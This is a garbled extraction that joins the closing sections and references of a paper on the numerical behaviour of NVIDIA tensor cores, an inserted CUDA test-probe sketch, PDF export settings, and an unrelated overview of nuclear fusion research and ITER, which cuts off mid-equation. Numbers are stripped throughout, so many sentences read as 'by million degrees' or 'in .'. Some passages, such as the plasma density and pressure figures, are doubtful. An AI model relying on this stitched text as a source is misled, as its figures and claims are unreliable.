we refer to the -element dot product in ( ), even though some of the tensor core operations available on a gpus use input vectors of dimension two or eight, as can be seen in table . in our tests we only use the first few elements of each input vector, so ( ) is relevant even when dealing with operations that would require some of the input vectors to have eight elements, as we tacitly assume that all the remaining entries are set to . fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in binary /binary mode, we found no differences between the ampere and turing tensor cores, as all the tests in our suite produce the same results on the two gpus. therefore we moved to the other three modes, which are new as they were introduced with the nvidia ampere architecture. we started by adapting our test suite to the bfloat /binary mode. the main difference in this configuration is that the subnormals in bfloat are a subset of the subnormals in binary , whereas all binary subnormals were normalized values in binary . for this reason, in binary /binary mode, we could only observe that binary subnormals in the input are preserved in the output. in this mode, however, binary subnormal outputs may in principle be produced during the computation from normal inputs, and we can verify that this is indeed the case with the following experiment. if in ( ) we set a = − , b = − (normalized bfloat values), and the remaining coefficients to zero, the tensor cores correctly produce the subnormal binary result d = − . to summarize, this precision configuration presents the same numerical behavior as the binary /binary configuration in the t gpu tensor cores, and an additional test for subnormals confirmed full support for bfloat subnormal input and binary subnormal output. next we looked at the a with tensor cores configured in tensorfloat- /binary mode. tensorfloat- can represent more subnormal values than bfloat due to extra bits in the significand (table ), and this was taken into account in our tests. the rest of the test suite was run with the same input used for the binary /binary configuration, since the significands are of the same width, and produced the same results. our conclusion is that the tensorfloat- /binary mode exhibits the same features as the binary /binary configuration in the t gpu. the last configuration of the ampere tensor cores is binary /binary . we found that the numerical behavior of this mode differs significantly from that of the other three configurations that are available on these graphic cards. in the multi-operand addition in ( ), in particular, we observed that round-to-nearest with ties to even is used, and that the normalization is performed after each addition rather than only once at the end of the computation. as the result of each addition is normalized, no extra bits for carries are required, and the monotonicity issue discussed in “features of the accumulator” does not occur for this rounding mode. we also note that since accumulation is performed in binary , there would be no advantage in holding the binary products exactly. moreover, the additions in ( ) are not always performed starting from the largest addend, as was the case with the other modes. in summary, our results suggest that in binary / binary mode the ampere tensor cores have the same numerical features that a matrix multiply-accumulate operation implemented using ieee -compliant arithmetic operations would have. 
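all of the tests above were driven through the warp-level interface described in "nvidia volta tensor cores". to make that access path concrete, the following minimal sketch shows the general shape of such a probe, here checking whether a binary16 subnormal input survives the multiply-accumulate. it is a sketch under stated assumptions (see the leading comment), not the code from the paper's test suite, and the probe value is our own choice.

```cuda
// Minimal probe sketch (assumptions: CUDA 11 or later, a GPU of compute
// capability 7.0 or newer, compiled e.g. with `nvcc -arch=sm_70 tc_probe.cu`).
// Kernel name, host scaffolding and probe value are illustrative only and are
// not taken from the paper's repository; error checking is omitted.
#include <cstdio>
#include <cmath>
#include <cuda_fp16.h>
#include <mma.h>

using namespace nvcuda;

// One warp computes a single 16x16x16 operation D = A*B + C through the
// warp-level wmma interface.
__global__ void wmma_probe(const half *a, const half *b, const float *c, float *d) {
    wmma::fragment<wmma::matrix_a, 16, 16, 16, half, wmma::row_major> a_frag;
    wmma::fragment<wmma::matrix_b, 16, 16, 16, half, wmma::row_major> b_frag;
    wmma::fragment<wmma::accumulator, 16, 16, 16, float> c_frag, d_frag;

    wmma::load_matrix_sync(a_frag, a, 16);
    wmma::load_matrix_sync(b_frag, b, 16);
    wmma::load_matrix_sync(c_frag, c, 16, wmma::mem_row_major);
    wmma::mma_sync(d_frag, a_frag, b_frag, c_frag);
    wmma::store_matrix_sync(d, d_frag, 16, wmma::mem_row_major);
}

int main() {
    // All entries are zero except a11 and b11, so only one 4-element dot
    // product (hence a single tensor core operation) is exercised.
    half  ha[256], hb[256];
    float hc[256] = {0}, hd[256] = {0};
    for (int i = 0; i < 256; ++i) {
        ha[i] = __float2half(0.0f);
        hb[i] = __float2half(0.0f);
    }
    ha[0] = __float2half(ldexpf(1.0f, -24));  // smallest binary16 subnormal, 2^-24
    hb[0] = __float2half(1.0f);

    half *da, *db;
    float *dc, *dd;
    cudaMalloc(&da, sizeof(ha));  cudaMalloc(&db, sizeof(hb));
    cudaMalloc(&dc, sizeof(hc));  cudaMalloc(&dd, sizeof(hd));
    cudaMemcpy(da, ha, sizeof(ha), cudaMemcpyHostToDevice);
    cudaMemcpy(db, hb, sizeof(hb), cudaMemcpyHostToDevice);
    cudaMemcpy(dc, hc, sizeof(hc), cudaMemcpyHostToDevice);

    wmma_probe<<<1, 32>>>(da, db, dc, dd);   // one full warp
    cudaMemcpy(hd, dd, sizeof(hd), cudaMemcpyDeviceToHost);

    // If subnormal binary16 inputs are preserved, d11 equals 2^-24 (0x1p-24);
    // if they are flushed to zero, d11 is 0.
    printf("d11 = %a\n", hd[0]);
    return 0;
}
```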
conclusions our experiments indicate that the tensor cores in the nvidia v architecture have the following numerical features. the first two of these (except the rounding mode for the second one) are stated in the nvidia documentation and are confirmed by our fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experiments, while the rest are not documented by nvidia and have been revealed by our tests. . the binary products in ( ) are computed exactly, and the results are kept in full precision and not rounded to binary after the multiplication. . the additions in ( ) are performed using binary arithmetic with round-towards-zero. . subnormal numbers in binary and binary are supported. . the five summands in ( ) are accumulated starting with the largest in absolute value. . only the final result of ( ) is normalized; the partial sums are not, and the accumulator has an internal significand that is bits wide to accommodate for carries of the -term addition. . the dot products in tensor cores are non-monotonic: in some cases, increasing the magnitude of the inputs to ( ) reduces the magnitude of the final result, when the summands in ( ) are all nonnegative or all nonpositive, the same properties were found in the second generation tensor cores which equip the nvidia t gpus, the main difference being one extra bit of precision in the significand of the internal accumulator of the binary -operand adder. in the third generation of tensor cores, available on the nvidia a gpus, all features were the same as in the t , with the exception of the binary /binary tensor cores, which we found are implemented to behave as if implemented in ieee -compliant arithmetic. the test suite that we have developed as part of this work can be used to test various properties of the floating-point arithmetic of future versions of tensor cores as well as similar accelerators. we aim to keep extending our test suite by adding new test cases for standard non-mixed-precision binary or binary dot product or matrix multiply units, as well as for integer arithmetic. the nvidia turing and ampere tensor cores, for instance, added support for - and -bit integer modes (nvidia, , b), and rounding issues become relevant when these are used to implement fixed-point arithmetic. acknowledgements the authors thank the university of manchester for providing access to the nvidia v graphic cards through the computational shared facility, the it services of the university for setting up access to the nvidia t graphic cards through the amazon web services, and the innovative computing laboratory at the university of tennessee, knoxville, us for providing access to the nvidia a graphics cards. additional information and declarations funding mantas mikaitis was supported by an epsrc doctoral prize fellowship and grant ep/p / . nicholas j. higham and srikara pranesh were supported by engineering and physical sciences research council grant ep/p / . nicholas j. higham and fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ massimiliano fasi were supported by the royal society. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc: ep/p / . engineering and physical sciences research council: ep/p / . royal society. competing interests nicholas j. 
higham is an academic editor for peerj computer science. author contributions � massimiliano fasi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � nicholas j. higham analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mantas mikaitis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � srikara pranesh analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the repository is available at github and contains the source code used for performing the experiments: https://github.com/mfasi/tensor-cores-numerical-behavior. references abdelfattah a, anzt h, boman eg, carson e, cojean t, dongarra j, gates m, grützmacher t, higham nj, li s, lindquist n, liu y, loe j, luszczek p, nayak p, pranesh s, rajamanickam s, ribizel t, smith b, swirydowicz k, thomas s, tomov s, tsai ym, yamazaki i, yang um. . a survey of numerical methods utilizing mixed precision arithmetic. available at https://arxiv.org/abs/ . . arm ltd. . arm architecture reference manual. technical report arm ddi f.b (id ). available at https://developer.arm.com/documentation/ddi /fb/?lang=en. basso pm, dos santos ff, rech p. . impact of tensor cores and mixed precision on the reliability of matrix multiplication in gpus. ieee transactions on nuclear science ( ): – doi . /tns. . . blanchard p, higham nj, lopez f, mary t, pranesh s. . mixed precision block fused multiply-add: error analysis and application to gpu tensor cores. siam journal on scientific computing ( ):c –c doi . / m . ercegovac md, lang t. . digital arithmetic. san francisco: morgan kauffmann. fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/mfasi/tensor-cores-numerical-behavior https://arxiv.org/abs/ . https://developer.arm.com/documentation/ddi /fb/?lang=en http://dx.doi.org/ . /tns. . http://dx.doi.org/ . / m http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ google. . system architecture. available at https://cloud.google.com/tpu/docs/system-architecture (accessed april ). haidar a, abdelfattah a, zounon m, wu p, pranesh s, tomov s, dongarra j. a. the design of fast and energy-efficient linear solvers: on the potential of half-precision arithmetic and iterative refinement techniques. in: shi y, fu h, tian y, krzhizhanovskaya vv, lees mh, dongarra j, sloot pma, eds. computational science—iccs , volume of lecture notes in computer science. – . haidar a, bayraktar h, tomov s, dongarra j, higham nj. . mixed-precision solution of linear systems using accelerator-based computing. epub ahead of print november . proceedings of the royal society a: mathematical, physical and engineering sciences doi . /rspa. . . haidar a, tomov s, dongarra j, higham nj. b. harnessing gpu tensor cores for fast fp arithmetic to speed up mixed-precision iterative refinement solvers. in: proceedings of the international conference for high performance computing, networking, storage, and analysis, sc (dallas, tx). piscataway: ieee, : – : . hickmann b, bradford d. . 
experimental analysis of matrix multiplication functional units. in: proceedings of the th ieee symposium on computer arithmetic, kyoto, japan, – . ieee. . ieee standard for floating-point arithmetic, ieee std - (revision of ieee std - ). piscataway: ieee. intel corporation. . bfloat —hardware numerics definition. available at https://software. intel.com/en-us/download/bfloat -hardware-numerics-definition (accessed july ). intel corporation. . intel architecture instruction set extensions and future features programming reference. available at https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf (accessed july ). jia z, maggioni m, smith j, scarpazza dp. a. dissecting the nvidia turing t gpu via microbenchmarking. available at https://arxiv.org/abs/ . . jia z, maggioni m, staiger b, scarpazza dp. b. dissecting the nvidia volta gpu architecture via microbenchmarking. available at https://arxiv.org/abs/ . . kahan wm. . paranoia. available at http://www.netlib.org/paranoia/paranoia.b (accessed july ). karpinski r. . paranoia: a floating-point benchmark. byte magazine ( ): – . kaul h, anders m, mathew s, kim s, krishnamurthy r. . optimized fused floating-point many-term dot-product hardware for machine learning accelerators. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . kim d, kim l. . a floating-point unit for d vector inner product with reduced latency. ieee transactions on computers ( ): – doi . /tc. . . markidis s, chien swd, laure e, peng ib, vetter js. . nvidia tensor core programmability, performance & precision. in: proceedings of the rd ieee international parallel and distributed processing symposium workshops. piscataway: ieee, – . mukunoki d, ozaki k, ogita t, imamura t. . dgemm using tensor cores, and its accurate and reproducible versions. in: sadayappan p, chamberlain bl, juckeland g, ltaief h, eds. proceedings of the international conference on high performance computing. new york: springer international publishing, – . muller j-m, brunie n, de dinechin f, jeannerod c-p, joldes m, lefèvre v, melquiond g, revol n, torres s. . handbook of floating-point arithmetic. second edition. cham: birkhäuser. fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cloud.google.com/tpu/docs/system-architecture http://dx.doi.org/ . /rspa. . https://software.intel.com/en-us/download/bfloat -hardware-numerics-definition https://software.intel.com/en-us/download/bfloat -hardware-numerics-definition https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://www.netlib.org/paranoia/paranoia.b http://dx.doi.org/ . /tc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nvidia. . nvidia tesla v gpu architecture. available at https://images.nvidia.com/ content/volta-architecture/pdf/volta-architecture-whitepaper.pdf (accessed july ). nvidia. . nvidia turing gpu architecture. available at https://www.nvidia.com/content/ dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing- architecture-whitepaper.pdf (accessed july ). nvidia. a. multiply-and-accumulate instruction: mma. 
available at https://docs.nvidia.com/ cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma (accessed april ). nvidia. b. nvidia a tensor core gpu architecture. available at https://www.nvidia. com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf (accessed july ). nvidia. c. nvidia cuda math api. available at https://docs.nvidia.com/cuda/cuda-math- api/index.html (accessed april ). santoro mr, bewick g, horowitz ma. . rounding algorithms for ieee multipliers. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . sohn j, swartzlander ee. . a fused floating-point four-term dot product unit. ieee transactions on circuits and systems i: regular papers ( ): – doi . /tcsi. . . tao y, deyuan g, xiaoya f, nurmi j. . correctly rounded architectures for floating-point multi-operand addition and dot-product computation. in: proceedings of the th international conference on application-specific systems, architectures and processors. – . tenca af. . multi-operand floating-point addition. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . yan d, wang w, chu x. . demystifying tensor cores to optimize half-precision matrix multiply. in: ieee international parallel and distributed processing symposium, new orleans, la, usa. piscataway: ieee, – . fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://www.nvidia.com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf https://docs.nvidia.com/cuda/cuda-math-api/index.html https://docs.nvidia.com/cuda/cuda-math-api/index.html http://dx.doi.org/ . /tcsi. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ numerical behavior of nvidia tensor cores introduction previous work results conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . 
international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - nuclear fusion power – an overview of history, present and future stewart c.
prager department of physics university of wisconsin – madison madison, wi , usa e-mail: scprager@wisc.edu summary—fusion power offers the prospect of an almost inexhaustible source of energy for future generations, but it also presents so far insurmountable engineering challenges. the fundamental challenge is to achieve a rate of heat emitted by a fusion plasma that exceeds the rate of energy injected into the plasma. the main hope is centered on tokamak reactors and stellarators which confine deuterium-tritium plasma magnetically. keywords-fusion energy; hydrogen power; nuclear fusion i. introduction today, many countries take part in fusion research to some extent, led by the european union, the usa, russia and japan, with vigorous programs also underway in china, brazil, canada, and korea. initially, fusion research in the usa and ussr was linked to atomic weapons development, and it remained classified until the atoms for peace conference in geneva. following a breakthrough at the soviet tokamak, fusion research became 'big science' in the s. but the cost and complexity of the devices involved increased to the point where international co- operation was the only way forward. fusion powers the sun and stars as hydrogen atoms fuse together to form helium, and matter is converted into energy. hydrogen, heated to very high temperatures changes from a gas to plasma in which the negatively-charged electrons are separated from the positively-charged atomic nuclei (ions). normally, fusion is not possible because the strongly repulsive electrostatic forces between the positively charged nuclei prevent them from getting close enough together to collide and for fusion to occur. however, if the conditions are such that the nuclei can overcome the electrostatic forces to the extent that they can come within a very close range of each other, then the attractive nuclear force (which binds protons and neutrons together in atomic nuclei) between the nuclei will outweigh the repulsive (electrostatic) force, allowing the nuclei to fuse together. such conditions can occur when the temperature increases, causing the ions to move faster and eventually reach speeds high enough to bring the ions close enough together. the nuclei can then fuse, causing a release of energy. ii. fusion technology in the sun, massive gravitational forces create the right conditions for fusion, but on earth they are much harder to achieve. fusion fuel – different isotopes of hydrogen – must be heated to extreme temperatures of the order of million degrees celsius, and must be kept stable under intense pressure, hence dense enough and confined for long enough to allow the nuclei to fuse. the aim of the controlled fusion research program is to achieve 'ignition', which occurs when enough fusion reactions take place for the process to become self-sustaining, with fresh fuel then being added to continue it. once ignition is achieved, there is net energy yield – about four times as much as with nuclear fission. according to the massachusetts institute of technology (mit), the amount of power produced increases with the square of the pressure, so doubling the pressure leads to a fourfold increase in energy production. with current technology, the reaction most readily feasible is between the nuclei of the two heavy forms (isotopes) of hydrogen – deuterium (d) and tritium (t). each d-t fusion event releases . mev ( . x - joule, compared with mev for a u- fission and - mev for d-d fusion). 
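as a point of reference for the energetics just quoted, the d-t reaction can be written out explicitly; the numerical values below are standard textbook figures supplied here for illustration, not recovered from the garbled numbers above:

    \mathrm{D} + \mathrm{T} \;\to\; {}^{4}\mathrm{He}\,(3.5\ \mathrm{MeV}) + \mathrm{n}\,(14.1\ \mathrm{MeV}), \qquad E_{\mathrm{total}} \approx 17.6\ \mathrm{MeV}

the mit statement that power grows with the square of the pressure follows from the reaction rate being proportional to the product of the reacting densities: at fixed temperature the fusion power density scales as

    P_{\mathrm{fus}} \;\propto\; n_{\mathrm{D}}\,n_{\mathrm{T}}\,\langle\sigma v\rangle \;\propto\; p^{2},

so doubling the pressure roughly quadruples the power output, as stated.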
on a mass basis, the d-t fusion reaction releases over four times as much energy as uranium fission. deuterium occurs naturally in seawater ( grams per cubic metre), which makes it very abundant relative to other energy resources. tritium occurs naturally only in trace quantities (produced by cosmic rays) and is radioactive, with a half-life of around years. usable quantities can be made in a conventional nuclear reactor, or, in the present context, bred in a fusion system from lithium. lithium is found in large quantities ( parts per million) in the earth's crust and in weaker concentrations in the sea. in a fusion reactor, the concept is that neutrons generated from the d-t fusion reaction will be absorbed in a blanket containing lithium which surrounds the core. the lithium is then transformed into tritium (which is used to fuel the reactor) and helium. the blanket must be thick enough (about metre) to slow down the high-energy ( mev) neutrons. the kinetic energy of the neutrons is absorbed by the blanket, causing it to heat up. the heat energy is collected by the coolant (water, helium or li-pb eutectic) flowing through the blanket and, in a fusion power plant, this energy will be used to generate electricity by conventional methods. if insufficient tritium is produced, some supplementary source must be employed, such as using a fission reactor to irradiate heavy water or lithium with neutrons, and extraneous tritium creates difficulties with handling, storage and transport. the difficulty has been to develop a device that can heat the d-t fuel to a high enough temperature and confine it long enough so that more energy is released through fusion reactions than is used to get the reaction going. while the d-t reaction is the main focus of attention, long-term hopes are for a d-d reaction, but this requires much higher temperatures. in any case, the challenge is to apply the heat to human needs, primarily generating electricity. the energy density of fusion reactions in gas is very much less than for fission reactions in solid fuel, and as noted the heat yield per reaction is times less. hence thermonuclear fusion will always have a much lower power density than nuclear fission, which means that any fusion reactor needs to be larger, and therefore more costly, than a fission reactor of the same power output. in addition, nuclear fission reactors use solid fuel which is denser than thermonuclear plasma, so the energy released is more concentrated. also the neutron energy from fusion is higher than from fission – . mev instead of about mev – which presents significant challenges regarding structural materials. at present, two main experimental approaches are being studied: magnetic confinement and inertial confinement. the first method uses strong magnetic fields to contain the hot plasma. the second involves compressing a small pellet containing fusion fuel to extremely high densities using strong lasers or particle beams. iii. magnetic confinement in magnetic confinement fusion (mcf), hundreds of cubic metres of d-t plasma at a density of less than a milligram per cubic metre are confined by a magnetic field at a few atmospheres pressure and heated to fusion temperature.
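for the lithium breeding blanket and the "hot enough, dense enough, long enough" requirement described above, the standard relations are worth writing down; the figures are common textbook values added here for context, not taken from the original article:

    \mathrm{n} + {}^{6}\mathrm{Li} \;\to\; {}^{4}\mathrm{He} + \mathrm{T} + 4.8\ \mathrm{MeV}, \qquad \mathrm{n} + {}^{7}\mathrm{Li} \;\to\; {}^{4}\mathrm{He} + \mathrm{T} + \mathrm{n} - 2.5\ \mathrm{MeV}

the confinement requirement is usually summarised by the fusion triple product; for d-t fuel, ignition roughly requires

    n\,T\,\tau_{E} \;\gtrsim\; 3 \times 10^{21}\ \mathrm{keV\,s\,m^{-3}},

where n is the fuel density, T the temperature and \tau_{E} the energy confinement time.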
magnetic fields are ideal for confining a plasma because the electrical charges on the separated ions and electrons mean that they follow the magnetic field lines. the aim is to prevent the particles from coming into contact with the reactor walls, as this will dissipate their heat and slow them down. the most effective magnetic configuration is toroidal, shaped like a doughnut, in which the magnetic field is curved around to form a closed loop. for proper confinement, this toroidal field must have superimposed upon it a perpendicular field component (a poloidal field). the result is a magnetic field with force lines following spiral (helical) paths that confine and control the plasma. there are several types of toroidal confinement system, the most important being tokamaks, stellarators and reversed field pinch (rfp) devices. in a tokamak, the toroidal field is created by a series of coils evenly spaced around the torus-shaped reactor, and the poloidal field is created by a system of horizontal coils outside the toroidal magnet structure. a strong electric current is induced in the plasma using a central solenoid, and this induced current also contributes to the poloidal field. in a stellarator, the helical lines of force are produced by a series of coils which may themselves be helical in shape. unlike tokamaks, stellarators do not require a toroidal current to be induced in the plasma. rfp devices have the same toroidal and poloidal components as a tokamak, but the current flowing through the plasma is much stronger and the direction of the toroidal field within the plasma is reversed. in tokamaks and rfp devices, the current flowing through the plasma also serves to heat it to a temperature of about million degrees celsius. beyond that, additional heating systems are needed to achieve the temperatures necessary for fusion. in stellarators, these heating systems have to supply all the energy needed. the tokamak (toroidalnya kamera ee magnetnaya katushka – torus-shaped magnetic chamber) was designed in by soviet physicists andrei sakharov and igor tamm. tokamaks operate within limited parameters outside which sudden losses of energy confinement (disruptions) can occur, causing major thermal and mechanical stresses to the structure and walls. nevertheless, it is considered the most promising design, and research is continuing on various tokamaks around the world. research is also being carried out on several types of stellarator. lyman spitzer devised and began work on the first fusion device – a stellarator – at the princeton plasma physics laboratory in . due to the difficulty in confining plasmas, stellarators fell out of favour until computer modelling techniques allowed accurate geometries to be calculated. because stellarators have no toroidal plasma current, plasma stability is increased compared with tokamaks. since the burning plasma can be more easily controlled and monitored, stellarators have an intrinsic potential for steady-state, continuous operation. the disadvantage is that, due to their more complex shape, stellarators are much more complex than tokamaks to design and build. rfp devices differ from tokamaks mainly in the spatial distribution of the toroidal magnetic field, which changes sign at the edge of the plasma.
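the pitch of the helical field lines described above is usually quantified by the safety factor q; the large-aspect-ratio expression below is a textbook approximation added here for illustration:

    q(r) \;\approx\; \frac{r\,B_{t}}{R\,B_{p}},

where B_{t} and B_{p} are the toroidal and poloidal field strengths and r and R are the minor and major radii: a field line makes roughly q toroidal circuits for every poloidal circuit. in the reversed field pinch mentioned above, the toroidal field (and hence q) passes through zero and changes sign near the plasma edge, which is the field reversal this configuration is named for.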
the rfx machine in padua, italy is used to study the physical problems arising from the spontaneous reorganisation of the magnetic field, which is an intrinsic feature of this configuration. iv. inertial confinement in inertial confinement fusion, which is a newer line of research, laser or ion beams are focused very precisely onto the surface of a target, which is a pellet of d-t fuel, a few millimetres in diameter. this heats the outer layer of the material, which explodes outwards generating an inward-moving compression front or implosion that compresses and heats the inner layers of material. the core of the fuel may be compressed to one thousand times its liquid density, resulting in conditions where fusion can occur. the energy released then would heat the surrounding fuel, which may also undergo fusion leading to a chain reaction (known as ignition) as the reaction spreads outwards through the fuel. the time required for these reactions to occur is limited by the inertia of the fuel (hence the name), but is less than a microsecond. so far, most inertial confinement work has involved lasers. recent work at osaka university's institute of laser engineering in japan suggests that ignition may be achieved at lower temperature with a second very intense laser pulse guided through a millimetre-high gold cone into the compressed fuel, and timed to coincide with the peak compression. this technique, known as 'fast ignition', means that fuel compression is separated from hot spot generation with ignition, making the process more practical. a completely different concept, the 'z-pinch' (or 'zeta pinch'), uses a strong electrical current in a plasma to generate x-rays, which compress a tiny d-t fuel cylinder. v. magnetized target fusion magnetized target fusion (mtf), also referred to as magneto-inertial fusion (mif), is a pulsed approach to fusion that combines the compressional heating of inertial confinement fusion with the magnetically reduced thermal transport and magnetically enhanced alpha heating of magnetic confinement fusion. a range of mtf systems are currently being experimented with, and commonly use a magnetic field to confine a plasma with compressional heating provided by laser, electromagnetic or mechanical liner implosion. as a result of this combined approach, shorter plasma confinement times are required than for magnetic confinement (from ns to ms, depending on the mif approach), reducing the requirement to stabilize the plasma for long periods. conversely, compression can be achieved over timescales longer than those typical for inertial confinement, making it possible to achieve compression through mechanical, magnetic, chemical, or relatively low-powered laser drivers. several approaches are underway to examine mtf, including experiments at los alamos national laboratory, sandia national laboratory, the university of rochester, and private companies general fusion and helion energy. r&d challenges for mtf include whether a suitable target plasma can be formed and heated to fusion conditions while avoiding contamination from the liner, as with magnetic confinement and inertial confinement. due to the reduced demands on confinement time and compression velocities, mtf has been pursued as a lower-cost and simpler approach to investigating these challenges than conventional fusion projects. vi. hybrid fusion fusion can also be combined with fission in what is referred to as hybrid nuclear fusion where the blanket surrounding the core is a subcritical fission reactor. 
the fusion reaction acts as a source of neutrons for the surrounding blanket, where these neutrons are captured, resulting in fission reactions taking place. these fission reactions would also produce more neutrons, thereby assisting further fission reactions in the blanket. the concept of hybrid fusion can be compared with an accelerator-driven system (ads), where an accelerator is the source of neutrons for the blanket assembly, rather than nuclear fusion reactions (see page on accelerator-driven nuclear energy). the blanket of a hybrid fusion system can therefore contain the same fuel as an ads – for example, the abundant element thorium or the long-lived heavy isotopes present in used nuclear fuel (from a conventional reactor) could be used as fuel. the blanket containing fission fuel in a hybrid fusion system would not require the development of new materials capable of withstanding constant neutron bombardment, whereas such materials would be needed in the blanket of a 'conventional' fusion system. a further advantage of a hybrid system is that the fusion part would not need to produce as many neutrons as a (non-hybrid) fusion reactor would in order to generate more power than is consumed – so a commercial-scale fusion reactor in a hybrid system does not need to be as large as a fusion-only reactor. vii. fusion research a long-standing quip about fusion points out that, since the s, commercial deployment of fusion power has always been about years away. while there is some truth in this, many breakthroughs have been made, particularly in recent years, and there are a number of major projects under development that may bring research to the point where fusion power can be commercialized. several tokamaks have been built, including the joint european torus (jet) and the mega amp spherical tokamak (mast) in the uk and the tokamak fusion test reactor (tftr) at princeton in the usa. the iter (international thermonuclear experimental reactor) project currently under construction in cadarache, france will be the largest tokamak when it operates in the s. the chinese fusion engineering test reactor (cfetr) is a tokamak which is reported to be larger than iter, and due for completion in . meanwhile china is running its experimental advanced superconducting tokamak (east). much research has also been carried out on stellarators. a large one of these, the large helical device at japan's national institute of fusion research, began operating in . it is being used to study the best magnetic configuration for plasma confinement. at the garching site of the max planck institute for plasma physics in germany, research carried out at the wendelstein -as between and is being progressed at the wendelstein -x, which was built over years at the max planck institute's greifswald site and started up at the end of . another stellarator, tj-ii, is in operation in madrid, spain. in the usa, at princeton plasma physics laboratory, where the first stellarators were built in , construction on the ncsx stellarator was abandoned in due to cost overruns and lack of funding. there have also been significant developments in research into inertial fusion energy (ife). construction of the $ billion national ignition facility (nif) at the lawrence livermore national laboratory (llnl), funded by the national nuclear security administration, was completed in march . the laser mégajoule (lmj) in france's bordeaux region started operation in october .
both are designed to deliver, in a few billionths of a second, nearly two million joules of light energy to targets measuring a few millimeters in size. the main purpose of both nif and lmj is for research to support both countries' respective nuclear weapons programs. viii. iter in , the soviet union suggested building a next generation tokamak with europe, japan and the usa. collaboration was established under the auspices of the international atomic energy agency (iaea). between and , the initial designs were drawn up for an international thermonuclear experimental reactor (iter, which also means 'a path' or 'journey' in latin) with the aim of proving that fusion could produce useful energy. the four parties agreed in to collaborate further on engineering design activities for iter. canada and kazakhstan are also involved through euratom and russia, respectively. six years later, the iter council approved the first comprehensive design of a fusion reactor based on well-established physics and technology with a price tag of $ billion. then the usa decided to pull out of the project, forcing a % reduction in costs and a redesign. the result was the iter fusion energy advanced tokamak (iter-feat) – initially expected to cost $ billion but still achieve the targets of a self-sustaining reaction and a net energy gain. the envisaged energy gain is unlikely to be enough for a power plant, but it should demonstrate feasibility. in , the usa rejoined the project and china also announced it would join. after deadlocked discussion, the six partners agreed in mid- to site iter at cadarache, in southern france. the deal involved major concessions to japan, which had put forward rokkasho as a preferred site. the european union (eu) and france would contribute half of the then estimated € . billion total cost, with the other partners – japan, china, south korea, usa and russia – putting in % each. japan will provide a lot of the high-tech components, will host a € billion materials testing facility – the international fusion materials irradiation facility (ifmif) – and will have the right to host a subsequent demonstration fusion reactor. india became the seventh member of the iter consortium at the end of . in november , the seven members – china, india, japan, russia, south korea, the usa and the european union – signed the iter implementing agreement. the total cost of the mw iter comprises about half for the ten-year construction and half for years of operation. site preparation works at cadarache commenced in january . first concrete for the buildings was poured in december . experiments were due to begin in , when hydrogen will be used to avoid activating the magnets, but this is now expected in . the first d-t plasma is not expected until . iter is large because confinement time increases with the cube of machine size. the vacuum vessel will be m across and m high, and weigh more than tonnes. the goal of iter is to operate with a plasma thermal output of mw (for at least seconds continuously) with less than mw of plasma heating power input. no electricity will be generated at iter. an associated cea facility at cadarache is west, formerly tore supra, which is designed to test prototype components and accelerate their development for iter.
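the iter power goal quoted above is normally expressed as a fusion gain q, the ratio of fusion power produced to external heating power supplied; the design figures usually cited for iter (added here for context, not recovered from the elided numbers above) are

    Q \;=\; \frac{P_{\mathrm{fusion}}}{P_{\mathrm{heating}}} \;\approx\; \frac{500\ \mathrm{MW}}{50\ \mathrm{MW}} \;=\; 10,

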